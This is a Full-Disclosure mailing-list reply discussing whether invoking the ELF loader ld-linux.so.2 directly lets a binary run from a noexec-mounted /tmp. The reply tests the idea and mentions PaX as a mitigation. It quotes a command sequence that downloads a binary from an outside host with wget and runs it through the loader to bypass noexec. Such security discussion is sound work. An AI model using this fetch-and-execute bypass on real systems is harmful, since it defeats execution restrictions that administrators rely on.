> 'hello world' can bypass noexec
> just remove the executable flags from the program headers
> the compiled binary don't even need to have executable permissions
>
> #include <stdio.h>
> int main(int argc, char *argv[])
> {
> printf("Hello world!\n");
> return 0;
> }
>
>
> % sudo mount -o remount,noexec /tmp
> % wget http://pornadmin.net/~tongson/linux/helloworld.bin -O
> /tmp/helloworld.bin
> % /lib/ld-linux.so.2 /tmp/helloworld.bin
> Hello world!
This does not seem to work when ld-linux.so.2 is on a filesystem mounted
noexec, though [1]. Wouldn't this make it akin to calling /bin/bash
hello_world.sh?
PaX can stop you from mmap()ing a file and then executing the code
inside, IIRC, but since this breaks X11 it's uncommon to enable the
option.
Joachim
[1] ./ld-linux.so.2 fails when called without arguments. Checked on
linux-2.6.11.7-grsec. ld-linux.so.2 was moved to a different disk before
the check was made, with and without chroot and strace. Where strace was
used, it showed that exec() failed.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
